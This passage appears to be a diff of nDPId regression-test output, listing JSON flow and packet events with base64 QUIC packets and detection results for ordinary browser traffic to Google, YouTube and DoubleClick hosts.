02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1621431301735,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431301735,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFJlAAH4RYWOokEAFgPgYAdC3AbsFTjagy\/8AAB0I1Sc982lv31UAAEU0GEDsnXM1346f3LKi+0ayIgknr4Rq\/qs0KnGSjmOfgKkNQLp8xEER9Qne8K9Dj4EYthFazH8nwogOlBFgQV5y3Fel1wV8LOfanwEdPEJ1ZJp+4xJmJEH3ze6GZ4lwHZsbcqCDQrzxSxyr8toIULGu2G\/50l56HzZwoikffxbY+R49tRZw4KX0e9zURynZK56t+njmlBuQWU+smCZVyJ9ypPFqKVXN7S\/8ucoFZ1YyJMN\/N8kqlm3ji7IGbOPNlw7irQvJ6BBxEwQlUJMHY0WKWUxD0Eb1MsXzLo9XO22gWFU3joZpaiSrB\/RDWZ1rp1Hfn0Ci0a8\/o47LT17Bf3EWgNA6oe86KkT1J6TFj5TGCEop\/KtIZTLdJ31PosLBOaXCkGm7G3FNW0bcjpPN+DwH3F\/o5LJ+Jg6E3+JR3af\/NqmM5lUPNhBagosvNZLci5aDdihLZLOTUxbxzA1HCgT\/ERn0TtIo+cvYtDBmA42xHr7Zw91voifBIp9+1r9Wgz2+fhJw6YMkrw\/R0ppcnpZJDX0HcDeOv1QITYaPEMCvPZWtVD56xX\/nIyNhER8spzpXJhfyZ7CLt2MQTJZYrSynYdh2Qhg0W\/Nnv+YnvHUimL5v9ucOAhisPrHZU6G8ccZVN9RPBkZp7we5VOgt\/sHvnaKFG385oGUa113YRpL+yC9+apyL7k0Lf9A9mH6jbSNwop0gbOz\/dSwao004T49FUKY+MYQSd1ZqRfOYZDWWvt4Z1+VpWWL9e3bLpDjurtDY1UVq7\/zyqXdPda+dj4dfpiumFbn95kie6gTbq0Ka77SOEVLy4F0R2VJz0mF6y8BHF7y+\/LWrLPikezYLBu3wp4yKo5ZMD+1RhjR0eYSiFStCQDoyh1ZzHLZrZgvvFV+EGsEUegku5d6U\/1xaEg70OUXkUj8MuVqNGP\/DVAWz6hGuIclLJHMXkZa1w4sqgXxuwiLhqmwpSjmxq15zo0Z6Ez9\/3O8teBesxAzKjLPt8Sjolvyd5nkwqOheF9hPlho5\/02ZAOHIA3HyHiqD0gFnqO5U5vPI269ren0HJGp9Y0aGm+Qy9oejwYJQfgaxeUOqcA7NVscX+RDbbgM1ZMcwzqUnM9YjlXsn6y6NTYw1rNff1zxlhQ08vVArWM2OumIoI++kTKQEg4JkAXQ3sxDPGAMMWQm14xHh1lESh4xPo3UHq2rynANu5+mkgpLsBsJIGzZOygMCZkmyp2fh7iY52BUb4Nx03epPzl6T\/HG2GNWULvucC8GPWEvPtkSLn35wNxlzF8NXX5lfbR6AqMs5QTbFYMg5BCH46iFuJgeJdSeBSv2NIL6sAH5f5tl5FrSe6SEykjojnE+KA8Pu32tMRLNHQvsRLkoRsuGCZmn0vJNgxR0Qj2ZnmdeI9WNinCOb\/TQqf05ttvs0B8SkG2JbukXe8IPAXK8CE2z3vwPoWYB2uzq10A+1l82xFsU23TRP69q5AjAR5gcBo2onzoy0h+\/Fh3MjRkS2rWgW2gbyo49\/6o+6I9tCoTl8e+t8H5Hr7OKKf7UKw0\/fDzsw6vvWL7Z180IeAQRORtYOnhVfjSCcEhIA8M4QlGvZG+XDbkn0clOXH6LrYUiHVBMh0b7ARqcsGvnK0HqjBlCVzGLKSDZa9icKkesJuZEIs2gxlcPU4atpOweh\/JejTvw0JRDflvusFCZ8LggbOTt4dNGmwJ7Mbm0OCxLaIc0U9h9Ubab5kq6QWk6OCd0h\/j2UBY7LZFZszsTdUnL22e1bgg4XWpAYp7qn"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431301735,"flow_last_seen":1621431301735,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431301735,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":53431,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431301735,"flow_last_seen":1621431301735,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431301735,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":53431,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1621431301808,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431301808,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFJpAAH4RYWKokEAFgPgYAdC3AbsFTrrvzP8AAB0I1Sc982lv31UAAEU0zeT7R306i0MUyYVVPZIk\/KZWGL6jbpzbn0wPmz3fvD9vdn3cNYtKf4Qtet1U\/nGKiDokhhMmX3\/BVLzQQyqFmb\/M8TdFlsBDC0dAZ5ykvarKqbUTSTgiy95Q6LfVZMqkeHJMsDpJptTPVl7gjw06GKLx5TW5G91hLE1FqeLb\/dNBqxaEBgwW7oSUsitPRczOioi+LEcRagKP4t5qnZ8aDmpfz8FLrvCECdKPswENLWuAf9Vmj\/tnC4GhgFxsu0TzsfmUVaQeeSZw9PR7DmOen7ZDKqiRf3DrGbxH8xiO73GPBoBDQjgENrZosMzfCGZE\/MTUgNw05SO8IzaGjJfPHze+4QhEnPM020WOHSfwtq28RMPlwJJF02yo3wlT\/NJAKohp0A5KX75ENMuJSkJLQaSqe0zoJ0tVJo5191cibx8Sz62pctFEM4BebxdU+RpZo0LdowaXCq1sachUxpRRHMdssDm0qblyaHts6qPgulEBH7aEgucpskAryrCvygwocC7svHgVLBmM\/+xK0IluLWY+kqgiVSTrV8WnG+1L5QgeJxSFASdp6Ns0TgD8Il7BJ8o5ajit3BypcmDF3DPrrI+Qx7QiBRmTSSPFFvm0GF3n7i0EkY2Hm8DzbT3wnL2YHAkVv9zggjYvZo1n1LI739jXkeIRrfAzGVeEvRFZmvKb1OdgKztEkV0hoFvvBdOHeKuCUUz4hKnv2+\/lYocOo+kRXiezYBrj7PqFapYBg0p2eH\/igSHIYxfLy7ikKIGXi4rRNmWXUqjcq4WUp8XDBW4tb+Z90I\/+mhDOTUok1Nigx2G\/7KbfM22h\/apHLFvkn9EIt06RDs3B76xXAur0AM2Ip6AMuYDnxYolFxG2K3ctE2xC1DRz7n0lKt3HhiR\/P5zOKCm0DfhmASldwBhjifKegO2oN9vU7M0DdrAxP\/JNcYjpWs+ie2MFdu2lsdJOex3XTLsfX1fJC8LBGXc1sOTG8uWnisGATLFKyNfzBcvv5C\/U2hjtcTGAngc3itVAnAbl+4hQ9s3hUMWsUk8+RJ0zRwPQbX2nZmyIhql2s6FpohxHCq5UoWxXh22BLb0zwRAvo6A759ODMT15ISyiIq\/u6XtqcB6tFsY4SDCIUFZLCzn8LY8hNbxKnIvT+kZgjTz2dylh0rVAxuhuUhpxNkpru0GmszDQWJ+1v76Pi\/R7HWIGyiEs+YivcWX8jXFsjBB8QfSitgQCCwYnJt4tNaulx0t7\/KVoJPhMWx2cAxrfacv8GgasdSu65cuLmWAlMC9W3slT8e4g0\/tto\/lATo46xcKpYU+fjCGriKRqNQMloM3kkzYIDJ3SwWWEk\/P3rFXpQXMr\/b1crw62J6Glt4mO9QzYLHGzgKwu\/euJxbE+eJO1ae7IMc4NRHHR85ltAKeR8XgoQo5N68sqCn2+MBEpQtbXHWnBMQz2HW6tkMHrohxRM8\/o23cHXLk1EsRmSry6aPgKepAtHk5rhQZjUer1NzID\/c8S0mu1iEEhSc4CLtwDa95xWQxcI5HMEDAcxxwRU\/MIaLOsI\/5mt+17GR+up2thq6thFHPVXAw+joWJg2Ed0ILpT3Tut1YgVVqZwcLTcnwOfBYMiG85DaaijQFB0dttNIqmW221\/RwD0coicDTwZyNZ\/VM3mnoVjqC6Lpsnt0MQaGsPhgoIU69TDIf9rzi7vHvOjiyWK40BX3xDHBVCSUpf7QS+RYWcOrXrADOELfOVIriZ9QMjQ4fxzn65DpF0UVgcyVId7aKLIvC4Qfz3"} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431305591,"flow_last_seen":1621431305591,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431305591,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"121.209.126.161","src_port":50482,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1621431305591,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431305591,"pkt":"AAAAAAAAAAEATej1CABFAAViY2BAAH4RsyKokEAFedF+ocUyAbsFTqiTwf8AAB0IW3iwt+y2cooAAEU0BEmji8W\/r6QQo738TO7y5dSuNAh8prkXOpfADst+Jc9Q9tTb4UI0vRbpsBAc\/wRyLzFYUecQ317zmJMLzTZl8Jd3ZiRr7yYjKX37LDNWlAoicKC4oliOH\/Fml25DnlNIMC5nvpDkdC5bMRw90FXK08RrmaBrmDz8JlipdUNPgq6+Ks9KDpvkjFtGyj5dpZ3gMuMYJ\/WogIBs3JzPpqngAdy\/QWH\/r\/vNVwYPPIH7tiEsC65BQyTkA7HqsyJkff7L\/WpxQokdQkBU8i8+seczGsyXRW\/ZJe3L2iHzkGEklOIcNZo10nU0am\/+mFv9bszZ1gDimSJ88GZcWsSJNfq+Q47ZVtA8nRSUIxcfLFnXeJPf6PU\/rb3+S0qU3oZcpaHV6agh8jvjdO0w\/VOq8qxpuNAX4LkLt40P2U151YrBr5x\/OeUgR+Z6s3QT73\/HzfP90bJE2S0skEBr+RDQY13GKYZklk5d8PV2Kpo38KXeuKakskZ5wi2woJvrGxrjC6dy\/btETblhn8osDCW539k50fXlOVrNB4tYZhdBrjJHSlXfbwhprDerXi32Hb5v8GxP+TWGbi0qBKv5xhEw3E7lsExoF4hu7AxtupA6MXdD\/\/f6nsoiLIb502HAdNTho568FOnbHatxotovMfok8tB77tKCpaP0enN8SDSqa1eXr3phlwvrsB1N8IyoHeHhPDB3mlqSTzZyp2hhDwIOLk5l9eNXb4xHGzjApfQLHaY0en\/gogDLaQeVjuQnQc70f+A2ywlWAXdLkP2C9LVdtL1r7vtwucagunaQbNYFe4w7n642v6LRQNiKSvAkNFxBJOicXbTdkburmROhEgL56f1Q93ZrU9KAY9ux7cXUbSz2tjxs8Qa6wJIeIr1x2JPW2pY3ylGZZDYZAu7yqS63SBDTa0WDJ2YdAWunIZm+DAVfhjaZtAj4eI4w6uPQAjhrCoPjKrLErXzuqx7sXAJFQxO2A4zcoit4huJuMpqzdY1UgUeAgie\/SSepMph5oCom4eMvOEKwkc5QonRZdyIpiAxa3aAdkn30E8RE6dtdPGch4nRH6Z6peyUQ\/xzAePd1pt+2lyuSFBwrXLkpjjk2T63ijkoMVykG1jIHqTL6VbWyhP4hLLhnznJc2v\/BPjkdBh0PPpuMO1BZZkopd7nuoNr7BIQeDS6PbzpyxT4WKDIasLmDyHw\/yGw\/r8T2HaOKcScYHVbxhlOhwg6vkVvTNtbDIUTpL+GcmTWQxz0+awTxBntBHWW2XF+QqtpquB3MGHkRjBzMGrwtChsrY5glPcwPNrPPPLFMguiPMSM5jSzWBWTIU1NciHn8dCkbmPwG75IN6zA3mioUEB3Ek98007I\/5so2LorUnz3QUpb09VXFeljvTD2\/ONwYANmDdDPP3pM62BtSycqNiX2CbGC5Vyjl2JuRWiIOpVgN4mTK6bkJK0Yc2Tt\/hfALU39E0hCz98Xsbk9g25C347kmDI+6o5J5KOTGciKIBmxTx0XS39uDAuhpOwuMMZXpcx4Vf04JfLuiNBot7rciv\/jQgEJAvfOFnFnTy\/cjvf8Z72bMe3Clm4eVyPKPxVWWCFWN4MZIPXhStwfxp7L9YCMfW5\/oi9I+Q5eaFQyvJaVOOHoLaBbG2DcrLP0Wl9HuaY\/B4CRtnuzBzHGKGio7n5DsFpRrH7tc6ky4QWHp5YEC+gVU3FroThHyBQkDCWRmOzPOImY6RD6ATpJNX1fGD3U1V12VcoYmjJM+eh+pvzZzfI2d57bkQ+g\/9Ch7"} -00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431305591,"flow_last_seen":1621431305591,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431305591,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"121.209.126.161","src_port":50482,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"yt3.ggpht.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431305591,"flow_last_seen":1621431305591,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431305591,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"121.209.126.161","src_port":50482,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"yt3.ggpht.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431307075,"flow_last_seen":1621431307075,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431307075,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"158.146.215.30","src_port":62652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1621431307075,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431307075,"pkt":"AAAAAAAAAAEA00bUCABFAAVijzpAAH4RCgqokEAFnpLXHvS8AbsFTmfYwf8AAB0IMX0JnIww67UAAEU0WXLvZGE+Afr+idrQ20zR+TEoH4qe7FkehtVpAee47RFYupCIo0eg\/DcR8TUJutvknKHjy6Va8WSvM1EWCYimGhVvNrQ+Fp0wmM+yyFY35rO08kD00xrPXP1H4Fk1Ofd1UfnQJk89eBBrRrAgNIIZzsqrTA2YPMgSp4UwmAVHJRtVJBMno66qsQpB5MQvisi+MDZENkGh9aq9g0sgJGWK095wFoEHqSie1cZEJH0NF7S9OLvFWBFqkCvegn2Nbgv1X3v0U4FwZWypfbJWLFwEnbR3285EnVWxHk\/SMMkHZmF0On1dQwUg3Qj0eZgGpqJ+FXEKe4uYJaEDgW57O4nU+0rSjJ3XzXQlfhw\/N4zTyFc0pjNRVcZvLiMXSfY4zYW3s6AIQlPy9VOM0+Sd2IN1gmmyrlJylMJVvj5QnrEWhimJh+zZEQruzz2mkSk8RFBjfgmsnANxoo9pkoo1TS97QkqmEvwlZfg6yosepp9RK65\/6peOS8TJ315KsHvbCu5MVzH5I4uEAg3ATybL0\/q2fjNpY\/e5kXcbiGD0xrzms9EN4h9y46YS0qZtRxTb54e2+c\/tkGE9oXd6ejJH7up2JrHyebJzWgY7y1\/4vmipy3uHgTNouauHpshSLQuocj\/IVA+m8M+S\/vIZxEEN5HxEShVKdzz3MydKf3IeaXIEkOogNU0EAfQF+FNMB1pAv4kA3D\/lhiw4mNTz7Pn2czcGqAoVM9Tb+FIl0v4naUGL2XsyFHEd0pdrvK0kyagKybt4WV5sy5dTFsU8oIYAkaDi0C0uvM\/hkA5rmYfgUGBRK7JNxcGRlB1h0fO7BcK++y+yfMx3k+B1cK7ObenTJrzFdENU9FiKc1npqAEG6qvPQ0489f2iKZpGKUe0BeleNnG8VKEEH4oM7w1ZPNdb6xC7Ch9EIMjjHN\/cAXUVd2BiR8doMWSeLNhCQrg5YRmEpmom8\/\/QGV8iDszvv8hWt\/MyXIyygAe9+QVeN26ZFXxatsAZKhRgqeS9+v7iRbNhTv\/yp28d0NIRzYLEysp\/VKAJSY\/PxvxR6eYrq0gk8M6gyt\/4BK1ZsK1h+llwW9nD\/t+dSlwau5F0J9hNHyoTUxT3\/2rWXx1WBqmNf7tT6HVASdYqI51YLphC\/t4BsXjG1U2fCZdns7t3a7Bu9FrBapBq8ozxlEwnaYBf9iuXer9XDB+ZQgwar2qMLM45G4ilP6GA0RkrpFDMK\/tSM78ey1CFRzLoD7+UjYyTIDcNhz56WZW\/cCCxyuopmvh2HuMiOaBDLX0ZH5LorqUuKLVpyJEcSbWHqdDvEIC2OQcfgQk4oVo+j3e1KvcgwqJTHG1uKoIKEu0XzvPdTW0gMnxGMRrPwDFCo77mU+Wk7zWBWHmjHLet1\/dYxkU8+0PHq4hWTvyi2WvPZLluvohq\/uVh5PNNj2h1VQCyJSuGN4gUneosa8Kp16gjYZ9wlLexOQBxfrtdOZHNANUy9BWZE48pGmjMCVwkfj5AoR+lwxIH1PbYVdSg1W6n2FrEJeYRs9EjR5zk5Ib8sLvbIBr0bkcLFp09zWWWvyzA5kGStYwmIoFVfVK1M8DAb6EOkQ\/RECglK66h9GO4PSBtbey5+Whbs8ZQwqwshqhdGjb\/1OCebCFnJxT4b25yYHn79Vu70lJgCSdcmKtbvBQodyXcJt1eGqpdLpKIO+Eplu9mc1YnLPgFA\/NdEhN2SwFoPGLdsaCDBDsYWHvxDTBH03HR3HVl7PSSq9lVQAnF9xjB0hUGCVyMcbzWm4Fj"} -00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431307075,"flow_last_seen":1621431307075,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431307075,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"158.146.215.30","src_port":62652,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"static.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431307075,"flow_last_seen":1621431307075,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431307075,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"158.146.215.30","src_port":62652,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"static.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431309055,"flow_last_seen":1621431309055,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431309055,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":63136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1621431309055,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431309055,"pkt":"AAAAAAAAAAEAS1QMCABFAAViW5hAAH4RACCokEAFCUGp\/PagAbsFTk75zP8AAB0IoJxBQBoX7TgAAEU0UJzG+bCyeSlhjmh9OGyP80hWwr1IV5nm+47YLijEK3KQr7gE9aToyGrLFbSZbr\/ot\/\/NhrLMkx5w9hUXpB6saN0FW9GivaLO3QW6nH3CEbSTx0vN4IWlz\/JYiJgSRdKp5yiIMpfFGjzOrzdapK0tDb+uDfZlGSI6b4fOTqadVuIZa7Vvz80YKtnFc+CKsIoEHyG+RVKlu8E7nUsvdaU1zjAfOXguC2O447Mq4l4iIuNZPa3X4qwTb1oBJViD2q6N5mxCHocUwd5IC1Czt\/KzM8ZvYZiaIu37vHuF4pEg0uyFIwWyEK0I3dICXfUy0FAthUUXOSQ\/qAjh83pIDqDmLm2oIH2HOI5yuYZbg4RhR2LcjLBI6jzxoT8wFqrBDURuZdJcnHFDl0KIt+h53s1VG0ioJi9EFRahccLL15Ih+xhJfJizq7Pj4ctwKdbyHsA9jLbn7BGdV2gCwR8YorYeGvatXhw3zhkfV39Cwpeuujb2aCauSV78zlMabBFL4I8dN4braPEQxADv6t882wA3cfqZmbZ60uGkg8o\/gGbldbBIsa\/FRs5yHZAy3QpgKNCZfgBmMgS7eLFSJs6rcXTEaMTPDLwpJJgNTV5uiX2tJSaIJYr3pSISnTR89Gx0X3HmUn\/Ja6T0TIlgJKfs7TsyV3\/O+pj\/KvUyMCLdWAd6hc3OeA+YtszQ9IkT0t3IpA1OTS8L7ZNGDMrpzcZ49\/um9SKUYcvskuDPhaNggUksgvTJNkykAOEaY25imLNje+fio\/CgCrOEzLgy9G+NM0WtOHSe3sLkVdRGEAlB8ruk5vv2PFS6ZLA25T0hhIjNffnQm3+PTFk9kp5zihC0fqEooPgerPJ+8+JYctFK\/gLWRbc6OMvqllIpSOsFv+DIs2hi7N22XRUDShPiuab421vCGIiM7eiQl2FqR1tqIihAoVLym23eHpBpBbJFceMhPtBiXoKcb55LGt9SppKd+KwhSDGVu3bTJZszb6XgDMccDIvwEjkETVY7jOTOHyZT0drrSCyhKYmxWWJw9iI7nyCGfm19D9sxHMXlftbXZVq2QywR0n8Tcly1vSGHvWdt6+A1Ohb0q9GI+TDf1MnPjKVMbc2Kjk4sa1bJ8BlYl2eeag5iJ6VyYM+GwJgezWvXmBp3qA2zBEXJQaqQ9yhweRmQybXzLdvwRU9OJ\/DC+vNSBAa8gMAK9mY5Yzv1YBeC909GfAlJvGCjI8JOls25+LbiBJQ85Ab9s9IytjWrn\/cyj3XQ4p1l6hp+Q080riZKDTXmNwz+ZUmSDeZjTgPQUatAzktduFtFx07hplZWmV+lNMIP2zDrs9dhGgepus2\/ERahVwFr5jRDchF2jCx5cqTiE9CwuAwI4ztSewXM+keDsmAAoGV8qicjKAmokyTujz8Pt0ubuL7Zo3\/+EwH0Fu0yqTI0PlfkDAxftdvubX0DwkPEL1Ys1JczkA5o2okvwzloGIRmG\/5p2ZLhuCcIfTMkB5hPFgkXmWE8bNKCsiCijKcxlJE58T\/Bs7KO99VWovYSh7XujacQIsrOWD4ngpsxQOnWzWHNI6Hz9zoCr3iAZfUtemo08nKkjt3hmmff6D2iPsNJUeEJV+R5NWzGfh4YokledF0c+qgfcyMCt23zpaXdET5Xlf0TYwS3j7a7j5hWdjf+2+Cp25Y643N5nVwFZXgmHCtXCbP\/TIPT+qvhoV6jTaL+\/rIu0EzVrFyk1QmNvT1Yr01Lyy4C0Uugxd3xMMGXt8WcXVXvtz\/2H0LnL9UTOZ0L"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431309055,"flow_last_seen":1621431309055,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431309055,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":63136,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"suggestqueries-clients6.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621425498439,"flow_last_seen":1621425498439,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431309055,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"251.236.18.198","src_port":44252,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 